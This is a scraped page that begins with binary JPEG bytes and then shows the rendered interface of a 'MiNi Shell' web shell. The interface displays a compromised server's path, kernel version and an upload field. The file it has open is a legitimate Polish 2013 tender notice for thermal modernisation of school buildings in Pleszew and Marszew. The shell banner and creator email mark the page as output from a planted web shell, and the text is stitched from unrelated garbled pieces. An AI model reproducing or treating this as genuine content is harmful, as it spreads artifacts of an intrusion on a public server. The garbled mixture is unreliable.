JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130207/52592-N-2013.html

<p class="kh_header"><b>Pleszew: Termomodernizacja obiektów użyteczności publicznej Powiatu Pleszewskiego 
w miejscowościach Pleszew oraz Marszew.</b><br>
<b>Numer ogłoszenia: 52592 - 2013; data zamieszczenia: 07.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Pleszewie , ul. Poznańska 79, 63-300 Pleszew, tel. 062 7429652, faks 062 7429665.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pleszew.starostwo.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja obiektów użyteczności publicznej Powiatu Pleszewskiego 
w miejscowościach Pleszew oraz Marszew..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest termomodernizacja obiektów użyteczności publicznej Powiatu Pleszewskiego w miejscowościach Pleszew oraz Marszew w części obejmującej następujące zadania:1). Zadanie nr 1:  Termomodernizacja budynku D Zespołu Szkół Przyrodniczo - Politechnicznych Centrum Kształcenia Ustawicznego w Marszewie. Zakres prac obejmuje: 1). Modernizację instalacji c.o:  a). demontaż zaworów zamontowanych na gałązkach zasilających w ilości 55 szt; b).montaż zaworów i głowic termostatycznych na grzejnikach w ilości 55 szt; c).płukanie chemiczne instalacji;  d).regulacja instalacji centralnego ogrzewania. 
2).Termomodernizację dachu: a).rozbiórka istniejącego pokrycia z papy oraz warstw podkładowych stropodachu pełnego; b).docieplenie dachu płytą warstwową o grubości 15 cm (płyta styropianowa EPS 100-038 obustronnie laminowana papą w ilości 331,24 m2); c). wykonanie nowego dwuwarstwowego pokrycia dachu z papy termozgrzewalnej modyfikowanej SBS na osnowie poliestrowej (warstwa podkładowa gr. 4 mm o gramaturze min 200 [g/m2], wierzchnia warstwa o gramaturze min. [250 g/m2] i gr. 5,2 mm w ilości 331,22 m2); d).demontaż istniejącego w części budynku pokrycia dachu z blachy falistej i zamocowanie płyt warstwowych blacha - styropian - blacha gr. 20 cm w ilości 345,58 m2);e).wymiana rynien i rur spustowych oraz innych obróbek blacharskich z blachy ocynkowanej na nowe z blachy powlekanej w kolorze grafit RAL 7011; f). rozbiórka komina oraz pomieszczenia na zbiornik wyrównawczy. 3). Termomodernizację ścian zewnętrznych: a). docieplenie ścian (płyty styropianowe EPS 70-040 o gr. 12 cm w metodzie bezspoinowej, z wykonaniem tynku mineralnego malowanego farbami egalizacyjnymi w ilości 887,39 m2, płyty styropianowe EPS 70-040 o gr. 2 cm (ościeża) w metodzie bezspoinowej z wykonaniem tynku mineralnego malowanego farbami egalizacyjnymi w ilości 56,38 m2. Cokoły należy wykończyć tynkiem mineralnym, malowanym farbami legalizacyjnymi); b). zaizolowanie murów piwnicznych  folią w płynie Folbit i styropianem o zmniejszonej chłonności wody (EPS-P 100-035), na którym należy wykonać warstwę zbrojącą z siatki z włókna szklanego izolowaną powłoką bitumiczną; c).wymiana parapetów zewnętrznych z blachy stalowej ocynkowanej na nowe z blachy powlekanej w kolorze grafit RAL 7011; d). montaż okien piwnicznych uchylno-rozwieranych z PCV w ilości 7,92 m2; e). montaż drzwi stalowych do kotłowni - 2 m2; f).montaż balustrad schodowych, krat okiennych, drabiny stalowej jednoelementowej z pałąkiem zabezpieczającym. 4).Wykonanie zewnętrznej opaski budynku z kostki betonowej wraz z obrzeżem - w ilości 60,00 m2. 5). Instalację odgromową: a). demontaż instalacji na czas prowadzonych robót oraz ponowny jej montaż po zakończeniu prac; b). wymiana zużytych elementów instalacji na nowe; c). pomiary instalacji odgromowej.
2). Zadanie nr 2: Termomodernizacja budynku C Zespołu Szkół Usługowo- Gospodarczych w Pleszewie. Zakres prac obejmuje: 1). Modernizację instalacji c.o.: a). płukanie chemiczne instalacji c.o. 2).Termomodernizację dachu: a). docieplenie dachu płytą warstwową o grubości 12 cm (płyta styropianowa EPS 100-038, obustronnie laminowana papą w ilości 232,75 m2); b). wykonanie nowego dwuwarstwowego pokrycia dachu z papy termozgrzewalnej modyfikowanej SBS na osnowie poliestrowej (warstwa podkładowa gr. 4 mm o gramaturze min. 200 [g/m2], wierzchnia warstwa o gramaturze min. 250  [g/m2] i gr. 5,2 mm w ilości 232,75 m2); c). wymiana rynien i rur spustowych z blachy ocynkowanej na nowe 
z PCV w kolorze brąz; d). wymiana obróbek blacharskich z blachy stalowej ocynkowanej na nowe z blachy stalowej powlekanej w kolorze brąz. 3). Termomodernizację ścian zewnętrznych: a). docieplenie ścian zewnętrznych (płyty styropianowe EPS 70-040 o gr. 12 cm w metodzie bezspoinowej z wykonaniem tynku mineralnego malowanego farbami egalizacyjnymi w ilości 581,76 m2,płyty styropianowe EPS 70-040 o gr. 2 cm (ościeża) w metodzie bezspoinowej, z wykonaniem tynku mineralnego malowanego farbami egalizacyjnymi w ilości 22,48 m2); b).przemurowanie murów ogniowych gr. 1 cegły w ilości 11,36 m2; c).wykonanie tynków cem - wap zewnętrznych kat. II w ilości 22,73 m2; d). wykończenie cokołów tynkiem mineralnym malowanym farbami egalizacyjnymi; e). zaizolowanie murów piwnicznych folią w płynie Folbit i styropianem o zmniejszonej chłonności wody (EPS-P 100-035), na którym należy wykonać warstwę zbrojącą z siatki z włókna szklanego, izolowaną powłoką bitumiczną; f). wymiana parapetów zewnętrznych i opierzeń na nowe z blachy stalowej powlekanej, w kolorze brąz; g). montaż kratek wentylacyjnych zewnętrznych z PCV, w kolorze brąz, w ilości 16 szt. 4) Instalację odgromową budynku: a). demontaż starej i wykonanie nowej instalacji odgromowej budynku; b). pomiary instalacji odgromowej. 5). Pozostałe roboty: a). oczyszczenie i pomalowanie elementów metalowych budynku: krat, balustrad; b).demontaż i ponowny montaż w rurkach przed dociepleniem instalacji zewnętrznych budynku: monitorującej, nagłośnienia, elektrycznej, c). montaż instalacji po wykonaniu docieplenia. 3). Zadanie nr 3: Termomodernizacja budynku D Zespołu Szkół Usługowo - Gospodarczych w Pleszewie.Zakres prac obejmuje:
1). Termomodernizację dachu: a). rozbiórka istniejącego pokrycia z papy oraz warstw podkładowych stropodachu pełnego; b). docieplenie dachu płytą warstwową o grubości 14 cm (płyta styropianowa EPS 100-038, obustronnie laminowana papą w ilości 168,70 m2); c). wykonanie nowego dwuwarstwowego pokrycia dachu z papy termozgrzewalnej modyfikowanej SBS na osnowie poliestrowej ( warstwa podkładowa gr. 4 mm o gramaturze min 200 [g/m2], wierzchnia warstwa o gramaturze min. [250 g/m2] i gr. 5,2 mm w ilości 168,70 m2); d). wymiana rynien i rur spustowych oraz innych obróbek blacharskich z blachy ocynkowanej na nowe, z blachy powlekanej w kolorze grafit RAL 7011. 2). Termomodernizację ścian zewnętrznych: a). docieplenie ścian zewnętrznych (płyty styropianowe EPS 70-040 o gr. 12 cm w metodzie bezspoinowej, z wykonaniem tynku mineralnego malowanego farbami egalizacyjnymi w ilości 339,94 m2, płyty styropianowe EPS 70-040 o gr. 2 cm (ościeża) w metodzie bezspoinowej, z wykonaniem tynku mineralnego malowanego farbami egalizacyjnymi w ilości 21,91 m2); b). wykonanie tynku mozaikowego z zaprawy Mozatynk w ilości 49,64 m2; c). wykończenie cokołów tynkiem mineralnym malowanym farbami egalizacyjnymi; d). zaizolowanie murów piwnicznych folią w płynie Folbit i styropianem gr. 10 cm, 
o zmniejszonej chłonności wody (EPS-P 100-035), na którym należy wykonać warstwę zbrojącą z siatki z włókna szklanego izolowaną powłoką bitumiczną; e).wymiana parapetów zewnętrznych z blachy stalowej ocynkowanej na nowe, z blachy powlekanej w kolorze grafit RAL 7011. 3). Roboty pozostałe: a). oczyszczenie i pomalowanie zewnętrznej drabiny; b). demontaż i ponowny montaż w rurkach przed dociepleniem instalacji zewnętrznych budynku: monitorującej, nagłośnienia, elektrycznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.26.10.00-4, 45.42.10.00-4, 45.26.25.00-6, 45.26.25.20-2, 45.41.00.00-4, 45.44.21.00-8, 45.44.21.10-1, 45.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości:
1).Dla zadania nr 1:  8.000,00 zł (słownie: osiem  tysięcy  złotych). 2). Dla zadanie nr 2: 4.000,00 zł (słownie: cztery  tysiące złotych). 3). Dla zadanie nr 3: 3.000,00 zł (słownie: trzy tysiące złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dla zadanie nr 1 - w zakresie wiedzy i doświadczenia Wykonawca musi wykazać się realizacją w ciągu ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy w tym okresie), co najmniej 2 robotami termomodernizacyjnymi budynków o wartości minimum 200.000,00 zł brutto każda. 2.Dla zadanie nr 2 - w zakresie wiedzy i doświadczenia Wykonawca musi wykazać się realizacją w ciągu ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy w tym okresie), co najmniej 2 robotami termomodernizacyjnymi  budynków o wartości minimum 
100.000,00 zł brutto każda. 3. Dla zadania nr 3 - w zakresie wiedzy i doświadczenia Wykonawca musi wykazać się realizacją w ciągu ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy w tym okresie), co najmniej 2 robotami termomodernizacyjnymi budynków o wartości minimum 100.000,00 zł brutto każda. 
Zamawiający przez roboty termomodernizacyjne rozumie roboty budowlane polegające na dociepleniu ścian, dachów lub stropodachów budynków. 
Zamawiający dokona oceny spełnienia ww. warunku na podstawie dokumentów załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie osób zdolnych do wykonania zamówienia dla zadań 1,2 i 3 Wykonawca musi wykazać się dysponowaniem minimum 1 osobą pełniącą funkcję kierownika robót, posiadającą uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane ( Dz.U. z 2010 r. Nr 243, poz.1623 ze zm. ) do kierowania robotami budowlanymi w specjalności  konstrukcyjno-budowlanej.
Zamawiający dokona oceny spełnienia ww. warunku na podstawie dokumentów załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie  prowadzonej działalności na sumę ubezpieczenia co najmniej 500.000,00 zł.
Zamawiający dokona oceny spełnienia ww. warunku na podstawie dokumentów załączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Kosztorysy ofertowe - zgodnie z załączonymi kosztorysami zerowymi,
2. Dokumenty potwierdzające równoważność oferowanych materiałów i urządzeń w przypadku składania ofert równoważnych.3. Dowód wniesienia wadium w formie pieniężnej lub w innej formie - zgodnie z pkt. XVI SIWZ. 4. Pełnomocnictwo do reprezentacji - jeżeli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w następujących okolicznościach: 1). Zmiany sposobu spełnienia świadczenia (roboty zamienne):a). konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych / technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy; b). konieczność wprowadzenia przez Zamawiającego zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych; c).konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa; d). konieczność zamiany materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych, w sytuacji ich niedostępności na rynku spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń. 2). Zmiany ceny umowy (zmniejszenie lub zwiększenie wynagrodzenia Wykonawcy): a). będące wynikiem rozliczenia robót zgodnie z §  5 projektu umowy (zmiany ilości jednostek przedmiarowych); b). będące wynikiem zmian określonych w pkt. 1); c). z powodu ustawowej zmiany stawki podatku VAT - o kwotę wynikającą ze zmienionych stawek podatku VAT obowiązujących w dacie powstania obowiązku podatkowego. 3). Zmiany terminów wykonania zadania, wynikających z: a). przestojów i opóźnień zawinionych przez Zamawiającego oraz zawieszenia robót przez Zamawiającego; b). działania siły wyższej (np. klęski żywiołowe), mającego bezpośredni wpływ na terminowość wykonania robót; c).wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót. 4). Niezależnych od stron umowy zmian dotyczących osób kluczowych dla realizacji umowy (choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pleszew.starostwo.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pleszewie, ul. Poznańska 79, 63 - 300 Pleszew, pokój nr 212. 
Cena: 144,90 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Pleszewie, ul. Poznańska 79, 63 - 300 Pleszew, pokój 104 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com